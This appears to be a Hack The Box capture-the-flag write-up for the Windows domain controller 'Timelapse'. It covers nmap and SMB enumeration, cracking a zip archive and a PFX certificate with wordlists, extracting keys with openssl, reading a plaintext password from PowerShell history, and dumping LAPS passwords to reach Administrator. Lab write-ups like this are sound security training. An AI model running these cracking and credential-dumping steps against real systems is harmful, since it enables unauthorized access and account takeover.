Hack The Box Timelapse Walkthrough
Timelapse
Initial recon
Ping
The machine is running on Windows. By default, Windows block ICMP requests, so pinging machines isn’t possible. On this box, the autor seems to have enabled ICMP :
$ ping -c2 10.10.11.152
PING 10.10.11.152 (10.10.11.152) 56(84) octets de données.
64 octets de 10.10.11.152 : icmp_seq=1 ttl=127 temps=83.8 ms
64 octets de 10.10.11.152 : icmp_seq=2 ttl=127 temps=83.5 ms
--- statistiques ping 10.10.11.152 ---
2 paquets transmis, 2 reçus, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 83.485/83.620/83.755/0.135 ms
Port scanning
Here is the result of nmap port scanning :
$ sudo nmap -sSVC -p- -T5 10.10.11.152 -oA timelapse_full
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-31 10:39 CEST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.11.152
Host is up (0.18s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-31 16:47:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_ssl-date: 2022-05-31T16:48:49+00:00; +7h59m53s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
54524/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-05-31T16:48:08
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h59m52s, deviation: 0s, median: 7h59m52s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 579.88 seconds
The certificate gave us a domain name, and the name of the server :
- timelapse.htb -> Domain
- dc01.timelapse.htb -> Server name
With this informations we learn that the machine is a domain controler, and we can precise the OS is a Microsoft Windows Server.
SMB
Getting the archive
Share listing :
$ smbclient -L 10.10.11.152
Password for [MYGROUP\libereau]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
In the Shares folder, a .zip file is present, but protected by a password.
$ smbclient //10.10.11.152/SHARES
Password for [MYGROUP\libereau]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 17:39:15 2021
.. D 0 Mon Oct 25 17:39:15 2021
Dev D 0 Mon Oct 25 21:40:06 2021
HelpDesk D 0 Mon Oct 25 17:48:42 2021
6367231 blocks of size 4096. 1319349 blocks available
smb: \> cd Dev
lsmb: \Dev\> ls
. D 0 Mon Oct 25 21:40:06 2021
.. D 0 Mon Oct 25 21:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 17:46:42 2021
6367231 blocks of size 4096. 1318297 blocks available
Cracking the archive
The zip file is password protected.
I’ve tried many thing, like zip2john, and trying to broke the hash, but it didn’t work. So I’ve found an online tool, which gave me the password for the zip file :
The password is “supremelegacy”.
The archive contain legacyy_dev_auth.pfx
.
First access to the machine
A pfx file, in format PKCS#12, contain the SSL certificate and the corresponding private key. Those keys can be use to authenticate to a machine using evilwinrm.
After some googling (again !) I’ve found a tool to bruteforce pfx file, called crackpkcs12. The tool ask in input, the pfx file (obviously) and a dictionnary. I’ve run it with rock you, and after some times :
$ crackpkcs12 -d rockyou.txt legacyy_dev_auth.pfx
Dictionary attack - Starting 1 threads
*********************************************************
Dictionary attack - Thread 1 - Password found: thuglegacy
*********************************************************
The password is then thuglegacy
.
We can then extract the files using openssl :
$ openssl pkcs12 -in legacyy_dev_auth.pfx -out cert.pem -nodes
$ openssl pkcs12 -in legacyy_dev_auth.pfx -out win.key -nodes
The connection is then easy, if you don’t forget to use the “-S” parameter to force ssl :
Privilege Escalation
After having the first access, the first thing to do is top upload winpeas.bat (or .exe) and run it. With evil-winrm you can just use the “upload” command to upload winpeas.bat on the server. I’ve run it, and saw something insteresting :
Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
03/04/2022 12:46 AM 434 ConsoleHost_history.txt
1 File(s) 434 bytes
0 Dir(s) 9,038,331,904 bytes free
The content of the file is the following :
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
We can se a user svc_deploy
and a password E3R$Q62^12p7PLlC%KWaxuaV
which might be the svc_deploy password.
Previously, by looking at the SMB Shares folder we saw some documentation about LAPS.
LAPS for “Local Administrator Password Solution” provides management of local accounts passwords of domain joined computer. Passwords are stored in Active Directory, and protected by ACL.
Many tools are available on github for dumping LAPS passwords. I’ve used this one. You just have to specify user, password and domain name :
This password is the Administrator password. We can then use it with evil-winrm to log in as Administrator.
Bim Bam Boom, rooted !
Thank you for reading, Libereau